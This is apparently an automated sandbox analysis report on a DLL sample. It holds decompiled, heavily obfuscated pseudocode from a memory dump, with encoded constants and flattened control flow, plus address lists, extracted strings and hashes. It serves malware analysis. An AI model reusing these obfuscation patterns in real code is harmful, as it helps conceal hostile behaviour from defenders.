				_v368 = _v368 | 0x7320cec6;
				_v368 = _v368 ^ 0x73273aba;
				_v336 = 0xf33546;
				_v336 = _v336 ^ 0x37961faf;
				_v336 = _v336 ^ 0x37663e0b;
				_v328 = 0x922129;
				_v328 = _v328 | 0xf90cd049;
				_v328 = _v328 ^ 0xf99851f2;
				_v416 = 0x9fd52c;
				_v416 = _v416 << 2;
				_v416 = _v416 * 0x22;
				_v416 = _v416 + 0xffff9e7e;
				_v416 = _v416 ^ 0x54e779e0;
				_v380 = 0x615361;
				_v380 = _v380 >> 1;
				_v380 = _v380 + 0x673e;
				_v380 = _v380 ^ 0x003e049c;
				_v308 = 0x9da5c1;
				_v308 = _v308 + 0xf72;
				_v308 = _v308 ^ 0x009db133;
				while(1) {
					L1:
					_t309 = 0xe35a561;
					do {
						while(1) {
							L2:
							_t399 = _t349 - 0x8816d6a;
							if(_t399 > 0) {
								break;
							}
							if(_t399 == 0) {
								_t325 =  *0x2b56228; // 0x0
								_t328 =  *0x2b56228; // 0x0
								_t332 =  *0x2b56228; // 0x0
								_t336 = E02B467E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
								_t397 = _t397 + 0x30;
								if(_t336 == 0) {
									L25:
									_t349 = 0xc732dcb;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								} else {
									_t349 = 0x772d3d2;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								}
							} else {
								if(_t349 == 0x200f7b2) {
									if(_v280 >= _v308) {
										_t338 = E02B42E5D( &_v284,  &_v276);
									} else {
										_t338 = E02B380C0( &_v284);
									}
									_t394 = _t338;
									_t309 = 0xe35a561;
									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
									continue;
								} else {
									if(_t349 == 0x323c58a) {
										_t364 =  *0x2b56228; // 0x0
										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
										 *((intOrPtr*)(_t364 + 4)) = _t340;
										if(_t340 == 0) {
											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
										}
										_t341 =  *0x2b56228; // 0x0
										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
											_t365 =  *0x2b56228; // 0x0
											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
										} else {
											_t349 = 0x902256d;
											while(1) {
												L1:
												_t309 = 0xe35a561;
												goto L2;
											}
										}
									} else {
										if(_t349 == 0x54cb160) {
											_t343 = E02B45779( &_v284, _t395, _v388, _v376, _v288);
											_t397 = _t397 + 0xc;
											if(_t343 != 0) {
												_t349 = 0x200f7b2;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										} else {
											if(_t349 != 0x772d3d2) {
												goto L35;
											} else {
												if(E02B36B7A(_v340, _a16, _v384,  &_v268) == 0) {
													_t390 = 0x323c58a;
												} else {
													_t390 = 0x72c7f38;
													_t346 = 1;
												}
												_t349 = 0x939e27d;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t346;
						}
						if(_t349 == 0x902256d) {
							_t394 = 0;
							E02B4FE2A(_v312, _v356, 0x100,  &_v260);
							_v276 = 0;
							_t349 = 0x54cb160;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t349 == 0x939e27d) {
								E02B52B09(_v364, _v268, _v320, _v372);
								goto L25;
							} else {
								if(_t349 == 0xc732dcb) {
									E02B52B09(_v344, _v284, _v348, _v300);
									E02B52B09(_v396, _t394, _v368, _v336);
									E02B52B09(_v328, _v276, _v416, _v380);
									_t397 = _t397 + 0x18;
									_t349 = _t390;
									L34:
									_t309 = 0xe35a561;
									goto L35;
								} else {
									if(_t349 != _t309) {
										goto L35;
									} else {
										_push(_t349);
										_push(_t349);
										_t322 = E02B4CCA0(1, 0x40);
										_push( &_v260);
										_push(_t322);
										_push(_v304);
										_t382 = 0xb;
										E02B3E404(_v316, _t382);
										_t397 = _t397 + 0x1c;
										_t349 = 0x8816d6a;
										goto L1;
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t349 != 0x72c7f38);
					goto L38;
				}
			}

0x02b4d1c6
0x02b4d1cd
0x02b4d1d1
0x02b4d1d8
0x02b4d1df
0x02b4d1e6
0x02b4d1ed
0x02b4d1f4
0x02b4d1fb
0x02b4d1fc
0x02b4d1fd
0x02b4d202
0x02b4d20d
0x02b4d210
0x02b4d21a
0x02b4d222
0x02b4d224
0x02b4d22c
0x02b4d231
0x02b4d236
0x02b4d23e
0x02b4d246
0x02b4d24e
0x02b4d256
0x02b4d25b
0x02b4d260
0x02b4d268
0x02b4d270
0x02b4d278
0x02b4d280
0x02b4d288
0x02b4d290
0x02b4d298
0x02b4d2a0
0x02b4d2ae
0x02b4d2b1
0x02b4d2b5
0x02b4d2ba
0x02b4d2c2
0x02b4d2ca
0x02b4d2d5
0x02b4d2e0
0x02b4d2eb
0x02b4d2f3
0x02b4d2fb
0x02b4d303
0x02b4d308
0x02b4d310
0x02b4d318
0x02b4d31d
0x02b4d325
0x02b4d330
0x02b4d33b
0x02b4d346
0x02b4d353
0x02b4d357
0x02b4d35c
0x02b4d361
0x02b4d369
0x02b4d371
0x02b4d376
0x02b4d37b
0x02b4d383
0x02b4d38b
0x02b4d390
0x02b4d398
0x02b4d3a0
0x02b4d3a5
0x02b4d3ad
0x02b4d3b5
0x02b4d3bd
0x02b4d3c8
0x02b4d3d5
0x02b4d3e0
0x02b4d3e8
0x02b4d3f6
0x02b4d3fb
0x02b4d401
0x02b4d409
0x02b4d411
0x02b4d419
0x02b4d421
0x02b4d429
0x02b4d431
0x02b4d436
0x02b4d43e
0x02b4d446
0x02b4d44e
0x02b4d456
0x02b4d45e
0x02b4d466
0x02b4d473
0x02b4d47b
0x02b4d47f
0x02b4d487
0x02b4d48f
0x02b4d494
0x02b4d49c
0x02b4d4a4
0x02b4d4ac
0x02b4d4b4
0x02b4d4bc
0x02b4d4c4
0x02b4d4cc
0x02b4d4d4
0x02b4d4dc
0x02b4d4e1
0x02b4d4e9
0x02b4d4f4
0x02b4d4fc
0x02b4d507
0x02b4d50f
0x02b4d51c
0x02b4d524
0x02b4d52c
0x02b4d53a
0x02b4d541
0x02b4d545
0x02b4d54d
0x02b4d555
0x02b4d55d
0x02b4d565
0x02b4d56d
0x02b4d575
0x02b4d57d
0x02b4d585
0x02b4d58d
0x02b4d597
0x02b4d59b
0x02b4d5a3
0x02b4d5ab
0x02b4d5b3
0x02b4d5b7
0x02b4d5bf
0x02b4d5c7
0x02b4d5d2
0x02b4d5dd
0x02b4d5e8
0x02b4d5e8
0x02b4d5e8
0x02b4d5ed
0x02b4d5ed
0x02b4d5ed
0x02b4d5ed
0x02b4d5f3
0x00000000
0x00000000
0x02b4d5f9
0x02b4d716
0x02b4d726
0x02b4d742
0x02b4d76a
0x02b4d76f
0x02b4d774
0x02b4d785
0x02b4d785
0x02b4d5e8
0x02b4d5e8
0x02b4d5e8
0x00000000
0x02b4d5e8
0x02b4d776
0x02b4d776
0x02b4d5e8
0x02b4d5e8
0x02b4d5e8
0x00000000
0x02b4d5e8
0x02b4d5e8
0x02b4d5ff
0x02b4d605
0x02b4d6dd
0x02b4d6ed
0x02b4d6df
0x02b4d6df
0x02b4d6df
0x02b4d6f2
0x02b4d6fb
0x02b4d700
0x00000000
0x02b4d60b
0x02b4d611
0x02b4d691
0x02b4d69a
0x02b4d69d
0x02b4d6a0
0x02b4d6a3
0x02b4d6a8
0x02b4d6ad
0x02b4d6ad
0x02b4d6b0
0x02b4d6b8
0x02b4d8c4
0x02b4d8ca
0x02b4d6be
0x02b4d6be
0x02b4d5e8
0x02b4d5e8
0x02b4d5e8
0x00000000
0x02b4d5e8
0x02b4d5e8
0x02b4d613
0x02b4d619
0x02b4d677
0x02b4d67c
0x02b4d681
0x02b4d687
0x02b4d5e8
0x02b4d5e8
0x02b4d5e8
0x00000000
0x02b4d5e8
0x02b4d5e8
0x02b4d61b
0x02b4d621
0x00000000
0x02b4d627
0x02b4d647
0x02b4d653
0x02b4d649
0x02b4d64b
0x02b4d650
0x02b4d650
0x02b4d658
0x02b4d5e8
0x02b4d5e8
0x02b4d5e8
0x00000000
0x02b4d5e8
0x02b4d5e8
0x02b4d621
0x02b4d619
0x02b4d611
0x02b4d605
0x02b4d8d1
0x02b4d8da
0x02b4d8da
0x02b4d795
0x02b4d87f
0x02b4d887
0x02b4d890
0x02b4d897
0x02b4d89c
0x02b4d8a3
0x02b4d8aa
0x00000000
0x02b4d79b
0x02b4d7a1
0x02b4d864
0x00000000
0x02b4d7a7
0x02b4d7ad
0x02b4d817
0x02b4d82a
0x02b4d845
0x02b4d84a
0x02b4d84d
0x02b4d8b1
0x02b4d8b1
0x00000000
0x02b4d7af
0x02b4d7b1
0x00000000
0x02b4d7b7
0x02b4d7ca
0x02b4d7cb
0x02b4d7d0
0x02b4d7dc
0x02b4d7dd
0x02b4d7de
0x02b4d7ee
0x02b4d7ef
0x02b4d7f4
0x02b4d7f7
0x00000000
0x02b4d7f7
0x02b4d7b1
0x02b4d7ad
0x02b4d7a1
0x00000000
0x02b4d8b6
0x02b4d8b6
0x00000000
0x02b4d8c2

Strings

<9, xrefs: 02B4D31D
8M, xrefs: 02B4D411
yT, xrefs: 02B4D592
aSa, xrefs: 02B4D5AB
yT, xrefs: 02B4D5A3
}9, xrefs: 02B4D658
}9, xrefs: 02B4D79B
C:, xrefs: 02B4D268
ju~, xrefs: 02B4D429
0^, xrefs: 02B4D270
-c, xrefs: 02B4D3C8
>g, xrefs: 02B4D5B7

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
API String ID: 0-111235429
Opcode ID: cded012a5cf3ddabc5ae078d1b348dbd40f5cbbc89593277a0beb96d48f37266
Instruction ID: 710d55a1e53d1c50b4dbc81606b398bebca5b65d36f69aa6a1daf82e94b85744
Opcode Fuzzy Hash: cded012a5cf3ddabc5ae078d1b348dbd40f5cbbc89593277a0beb96d48f37266
Instruction Fuzzy Hash: D90240711083809FD369CF25C489A6BBBE1FBC4748F50890DE6DA86261CBB1D949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B357B8, Relevance: 14.4, Strings: 11, Instructions: 616
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E02B357B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				void* _t657;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t725;
				void* _t729;
				void* _t737;
				void* _t740;
				intOrPtr _t746;
				void* _t798;
				void* _t814;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t833;
				void* _t834;
				void* _t840;

				_push(_a24);
				_t746 = __edx;
				_push(_a20);
				_v224 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E02B4FE29(_t657);
				_v108 = 0x7f0a1;
				_t834 = _t833 + 0x20;
				_t832 = 0;
				_t740 = 0xa8b367c;
				_t816 = 0x72;
				_v108 = _v108 / _t816;
				_v108 = _v108 ^ 0x000011d4;
				_v220 = 0x3ea28;
				_v220 = _v220 | 0x6e60dce4;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x7fdd8000;
				_v272 = 0xf906dc;
				_v272 = _v272 + 0x5e9;
				_t817 = 0x7a;
				_v272 = _v272 * 0x15;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x70614800;
				_v264 = 0x600b37;
				_v264 = _v264 / _t817;
				_v264 = _v264 ^ 0x262493f0;
				_t818 = 0x3e;
				_v264 = _v264 * 0x11;
				_v264 = _v264 ^ 0x886a01f8;
				_v260 = 0xf3d497;
				_v260 = _v260 / _t818;
				_v260 = _v260 >> 6;
				_v260 = _v260 >> 3;
				_v260 = _v260 ^ 0x000001f7;
				_v156 = 0x8d2235;
				_v156 = _v156 >> 0xe;
				_t819 = 0xe;
				_v156 = _v156 * 0x5b;
				_v156 = _v156 ^ 0x0000c87c;
				_v292 = 0xf4d;
				_v292 = _v292 + 0x4732;
				_v292 = _v292 << 0x10;
				_v292 = _v292 << 0xe;
				_v292 = _v292 ^ 0xc0000000;
				_v216 = 0x258eaf;
				_v216 = _v216 * 0x48;
				_v216 = _v216 / _t819;
				_v216 = _v216 ^ 0x00c126f1;
				_v96 = 0xf75e54;
				_v96 = _v96 + 0xffff74b2;
				_v96 = _v96 ^ 0x00f6d306;
				_v268 = 0x92da;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 + 0x1646;
				_v268 = _v268 << 0xd;
				_v268 = _v268 ^ 0x02c9e000;
				_v196 = 0xf0429c;
				_t820 = 0x3d;
				_v196 = _v196 * 0x60;
				_v196 = _v196 >> 3;
				_v196 = _v196 ^ 0x0b431f50;
				_v232 = 0x6bfae5;
				_v232 = _v232 / _t820;
				_v232 = _v232 >> 4;
				_v232 = _v232 * 0x6e;
				_v232 = _v232 ^ 0x000c2b3c;
				_v40 = 0xa24143;
				_v40 = _v40 + 0xffff9191;
				_v40 = _v40 ^ 0x00a231cd;
				_v80 = 0x435983;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000556e3;
				_v180 = 0x94eafd;
				_v180 = _v180 + 0x1d08;
				_v180 = _v180 | 0xe944a694;
				_v180 = _v180 ^ 0xe9df3ebb;
				_v228 = 0xbcce84;
				_v228 = _v228 + 0xffff815d;
				_v228 = _v228 ^ 0xe4fbb881;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x0005fd7e;
				_v112 = 0x2fdad;
				_v112 = _v112 ^ 0x4ab81af1;
				_v112 = _v112 ^ 0x4abb9e1a;
				_v64 = 0x50dc85;
				_v64 = _v64 + 0xffff4d8c;
				_v64 = _v64 ^ 0x005cdb40;
				_v52 = 0x47f34d;
				_v52 = _v52 + 0xffff898a;
				_v52 = _v52 ^ 0x004c7feb;
				_v72 = 0xc369b0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 ^ 0x4c5d6799;
				_v132 = 0xe6e6b0;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 * 0x6c;
				_v132 = _v132 ^ 0x00059f00;
				_v172 = 0x544ea4;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0xc018668b;
				_v172 = _v172 ^ 0xca962b34;
				_v148 = 0x61f17d;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 + 0xffff8980;
				_v148 = _v148 ^ 0xfffa8c30;
				_v100 = 0xf619bc;
				_v100 = _v100 >> 0xa;
				_v100 = _v100 ^ 0x00008a95;
				_v200 = 0xa94e7a;
				_v200 = _v200 + 0xa696;
				_v200 = _v200 + 0xffff4550;
				_v200 = _v200 ^ 0x00a03757;
				_v208 = 0x57e0ef;
				_v208 = _v208 ^ 0x592bbff9;
				_v208 = _v208 ^ 0x4b5d2b88;
				_v208 = _v208 ^ 0x1221726f;
				_v284 = 0x804076;
				_v284 = _v284 ^ 0x9dc3529f;
				_v284 = _v284 + 0x2ad8;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0xa19e17b3;
				_v176 = 0xb506b1;
				_v176 = _v176 | 0xc528794d;
				_v176 = _v176 + 0x810e;
				_v176 = _v176 ^ 0xc5bbfa9c;
				_v184 = 0x64408f;
				_v184 = _v184 << 3;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x00066ce1;
				_v252 = 0x9e8dfe;
				_v252 = _v252 | 0x2316ff28;
				_v252 = _v252 + 0xbb4b;
				_v252 = _v252 ^ 0x205df49d;
				_v252 = _v252 ^ 0x03c75996;
				_v192 = 0x20a385;
				_v192 = _v192 ^ 0x2edbbce0;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x017066cd;
				_v312 = 0x989161;
				_v312 = _v312 + 0xa008;
				_v312 = _v312 + 0x4ac;
				_v312 = _v312 | 0x9f8d4417;
				_v312 = _v312 ^ 0x9f9ed397;
				_v320 = 0x6ba986;
				_t821 = 0x4d;
				_v320 = _v320 * 0x35;
				_v320 = _v320 + 0x6b8c;
				_v320 = _v320 + 0x347b;
				_v320 = _v320 ^ 0x164ad328;
				_v236 = 0xcaa528;
				_v236 = _v236 + 0x2035;
				_v236 = _v236 | 0x7bffa27f;
				_v236 = _v236 ^ 0x7bfdb1d6;
				_v276 = 0xb040eb;
				_v276 = _v276 * 0x3a;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00065548;
				_v280 = 0xf1680b;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 >> 1;
				_v280 = _v280 >> 0xd;
				_v280 = _v280 ^ 0x00049c20;
				_v288 = 0x575f50;
				_v288 = _v288 << 0xe;
				_v288 = _v288 | 0xa77b0e2e;
				_v288 = _v288 * 0x52;
				_v288 = _v288 ^ 0x6fbbe03a;
				_v296 = 0x568d1e;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 >> 6;
				_v296 = _v296 >> 9;
				_v296 = _v296 ^ 0x0008fa1d;
				_v304 = 0xd1fef6;
				_v304 = _v304 << 0x10;
				_v304 = _v304 * 0x2d;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x7c01ef7f;
				_v92 = 0xea5a63;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x4b4e4928;
				_v76 = 0xf64e35;
				_v76 = _v76 + 0xbf9b;
				_v76 = _v76 ^ 0x00fbc5d2;
				_v248 = 0xc75c6;
				_v248 = _v248 ^ 0x54d7d0af;
				_v248 = _v248 / _t821;
				_v248 = _v248 | 0x9c98695d;
				_v248 = _v248 ^ 0x9d9ac3a5;
				_v256 = 0x504a74;
				_v256 = _v256 | 0x8719e45c;
				_v256 = _v256 * 0x7b;
				_v256 = _v256 ^ 0x8d2796a4;
				_v256 = _v256 ^ 0x85162cc6;
				_v84 = 0x519e4e;
				_v84 = _v84 ^ 0x8be7953d;
				_v84 = _v84 ^ 0x8bbbe938;
				_v168 = 0x311266;
				_v168 = _v168 ^ 0x18ab2cb8;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x3478f01c;
				_v60 = 0x61fbf7;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x000e504b;
				_v240 = 0xf8ae17;
				_v240 = _v240 >> 3;
				_v240 = _v240 | 0x050ada64;
				_v240 = _v240 ^ 0x567c7cbc;
				_v240 = _v240 ^ 0x53659cbf;
				_v68 = 0xee6d4a;
				_t374 =  &_v68; // 0xee6d4a
				_t822 = 0x49;
				_v68 =  *_t374 * 0xf;
				_v68 = _v68 ^ 0x0dff5dbc;
				_v300 = 0x550c32;
				_v300 = _v300 * 0x12;
				_v300 = _v300 + 0xffff8d7f;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x0bfb5da9;
				_v124 = 0x6baac1;
				_v124 = _v124 * 0x60;
				_t823 = 0x6f;
				_v124 = _v124 / _t822;
				_v124 = _v124 ^ 0x0084cf47;
				_v188 = 0xec1707;
				_v188 = _v188 << 0xc;
				_v188 = _v188 + 0x1505;
				_v188 = _v188 ^ 0xc1795754;
				_v244 = 0xd962f7;
				_v244 = _v244 + 0xffffa966;
				_v244 = _v244 | 0x93df07c8;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x49e87f80;
				_v48 = 0x35494e;
				_v48 = _v48 / _t823;
				_v48 = _v48 ^ 0x000830fa;
				_v88 = 0x633bdd;
				_v88 = _v88 + 0xc138;
				_v88 = _v88 ^ 0x006a2257;
				_v56 = 0x559d1c;
				_v56 = _v56 + 0xffff12d8;
				_v56 = _v56 ^ 0x005735ca;
				_v104 = 0xdd1aac;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x0dd90d21;
				_v44 = 0x4278da;
				_t824 = 0x4e;
				_v44 = _v44 * 0x42;
				_v44 = _v44 ^ 0x112c636d;
				_v116 = 0x4ec2e;
				_v116 = _v116 + 0xffff43d8;
				_v116 = _v116 ^ 0x00065017;
				_v308 = 0xc5e4c2;
				_v308 = _v308 * 0x26;
				_v308 = _v308 + 0xa26d;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x25c4a583;
				_v36 = 0x60fc2;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x011987ae;
				_v140 = 0x8a5839;
				_v140 = _v140 << 0xb;
				_v140 = _v140 / _t824;
				_v140 = _v140 ^ 0x010a1534;
				_t814 = 0x30e419;
				_v204 = 0x180842;
				_v204 = _v204 ^ 0x577ac785;
				_v204 = _v204 + 0x1256;
				_v204 = _v204 ^ 0x5761cb73;
				_v136 = 0xcc77c3;
				_v136 = _v136 | 0x2e5c8e9b;
				_t825 = 0x3c;
				_v12 = 0xc2dfee2;
				_v16 = 0x8d06406;
				_v136 = _v136 * 0x19;
				_v136 = _v136 ^ 0x93985978;
				_v144 = 0xcb98e2;
				_v144 = _v144 ^ 0x2e2af391;
				_v144 = _v144 + 0xffff95d2;
				_v144 = _v144 ^ 0x2ee989ff;
				_v152 = 0x6e8dcb;
				_v152 = _v152 * 0x64;
				_v152 = _v152 ^ 0xf6de88b0;
				_v152 = _v152 ^ 0xddf9340f;
				_v160 = 0x1f41c3;
				_v160 = _v160 / _t825;
				_v160 = _v160 ^ 0x710c49d1;
				_v160 = _v160 ^ 0x7106b0fc;
				_v164 = 0xea0060;
				_v164 = _v164 << 2;
				_t826 = 0x54;
				_v164 = _v164 * 0x51;
				_v164 = _v164 ^ 0x2820691f;
				_v212 = 0x1a562c;
				_v212 = _v212 + 0xffff6884;
				_v212 = _v212 / _t826;
				_v212 = _v212 ^ 0x000ca439;
				_v316 = 0xc049a;
				_t827 = 0x4a;
				_v316 = _v316 / _t827;
				_v316 = _v316 >> 0xd;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x000978cf;
				_v120 = 0xbc159f;
				_t828 = 0x75;
				_v120 = _v120 * 0x6f;
				_t829 = 0x3acf932;
				_v120 = _v120 / _t828;
				_v120 = _v120 ^ 0x00bb77de;
				_v128 = 0x83c7e3;
				_v128 = _v128 ^ 0x1c1c3aef;
				_v128 = _v128 ^ 0x03a71d14;
				_v128 = _v128 ^ 0x1f3d9b10;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t840 = _t740 - 0x6051746;
								if(_t840 <= 0) {
									break;
								}
								__eflags = _t740 - 0x644521d;
								if(_t740 == 0x644521d) {
									E02B512C1(_v32, _v136, _v144, _v152, _v160);
									_t740 = 0x4160ee8;
									goto L25;
								} else {
									__eflags = _t740 - 0x8d06406;
									if(_t740 == 0x8d06406) {
										_push(_t746);
										_push(_t746);
										_t715 = E02B3C5D8(_v20);
										_t746 = _v224;
										_t834 = _t834 + 0xc;
										__eflags = _t715;
										_v24 = _t715;
										_t798 = 0x26ffc0;
										_t740 =  !=  ? 0x26ffc0 : _t814;
										_t716 = 0x5dc2900;
										continue;
									} else {
										__eflags = _t740 - 0xa8b367c;
										if(__eflags == 0) {
											_t740 = 0x6051746;
											continue;
										} else {
											__eflags = _t740 - 0xc2dfee2;
											if(__eflags == 0) {
												_push(_v276);
												_push(_v236);
												_push(_v320);
												_t737 = E02B3F288(_v272, _v280, E02B4E1F8(0x2b313f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0x2b313f8, _v304, _v28, _v92);
												_t834 = _t834 + 0x30;
												__eflags = _t737 - _v264;
												_t740 =  ==  ? _v16 : _t814;
												E02B4FECB(_t734, _v76, _v248, _v256, _v84);
												L16:
												_t829 = 0x3acf932;
												L25:
												_t746 = _v224;
												_t834 = _t834 + 0xc;
												_t798 = 0x26ffc0;
											}
											goto L26;
										}
									}
								}
								L29:
								return _t832;
							}
							if(_t840 == 0) {
								_push(_v228);
								_push(_v180);
								_push(_v80);
								_t717 = E02B4E1F8(0x2b313a8, _v40, __eflags);
								_push(_v72);
								_push(_v52);
								_push(_v64);
								__eflags = E02B3738A(_v132, _t717, _v172, _v108,  &_v28, E02B4E1F8(0x2b31318, _v112, __eflags), _v148) - _v220;
								_t740 =  ==  ? _v12 : 0x1841daf;
								E02B4FECB(_t717, _v100, _v200, _v208, _v284);
								_t834 = _t834 + 0x38;
								E02B4FECB(_t718, _v176, _v184, _v252, _v192);
								_t814 = 0x30e419;
								goto L16;
							} else {
								if(_t740 == _t798) {
									_t725 = E02B31BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
									_t834 = _t834 + 0x2c;
									__eflags = _t725 - _v292;
									_t746 = _v224;
									_t716 = 0x5dc2900;
									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
									goto L3;
								} else {
									if(_t740 == _t814) {
										E02B3F7FE(_v120, _v28, _v128, _v232);
									} else {
										if(_t740 == _t829) {
											_t729 = E02B322C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
											_t834 = _t834 + 0x18;
											_t740 = 0x644521d;
											__eflags = _t729 - _v196;
											_t832 =  ==  ? 1 : _t832;
											goto L11;
										} else {
											if(_t740 == 0x4160ee8) {
												E02B52B09(_v164, _v24, _v212, _v316);
												_t740 = _t814;
												goto L11;
											} else {
												if(_t740 != _t716) {
													goto L26;
												} else {
													E02B4CBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
													_t834 = _t834 + 0x18;
													_t740 =  ==  ? _t829 : 0x644521d;
													L11:
													_t746 = _v224;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t740 - 0x1841daf;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x02b357c2
0x02b357c9
0x02b357cb
0x02b357d2
0x02b357d6
0x02b357dd
0x02b357e4
0x02b357eb
0x02b357f2
0x02b357f3
0x02b357f5
0x02b357fa
0x02b35805
0x02b35811
0x02b35813
0x02b3581a
0x02b3581f
0x02b35828
0x02b35833
0x02b3583b
0x02b35843
0x02b35848
0x02b35850
0x02b35858
0x02b35865
0x02b35868
0x02b3586c
0x02b35871
0x02b35879
0x02b35889
0x02b3588d
0x02b3589a
0x02b3589d
0x02b358a1
0x02b358a9
0x02b358b9
0x02b358bd
0x02b358c2
0x02b358c7
0x02b358cf
0x02b358da
0x02b358ea
0x02b358eb
0x02b358f2
0x02b358fd
0x02b35905
0x02b3590d
0x02b35912
0x02b35917
0x02b3591f
0x02b3592c
0x02b35936
0x02b3593a
0x02b35942
0x02b3594d
0x02b35958
0x02b35963
0x02b3596b
0x02b35972
0x02b3597a
0x02b3597f
0x02b35987
0x02b3599c
0x02b3599d
0x02b359a4
0x02b359ac
0x02b359b7
0x02b359c5
0x02b359c9
0x02b359d3
0x02b359d7
0x02b359df
0x02b359ea
0x02b359f5
0x02b35a00
0x02b35a0b
0x02b35a13
0x02b35a1e
0x02b35a29
0x02b35a34
0x02b35a3f
0x02b35a4a
0x02b35a52
0x02b35a5a
0x02b35a62
0x02b35a67
0x02b35a6f
0x02b35a7a
0x02b35a85
0x02b35a90
0x02b35a9b
0x02b35aa6
0x02b35ab1
0x02b35abc
0x02b35ac7
0x02b35ad2
0x02b35ae5
0x02b35aec
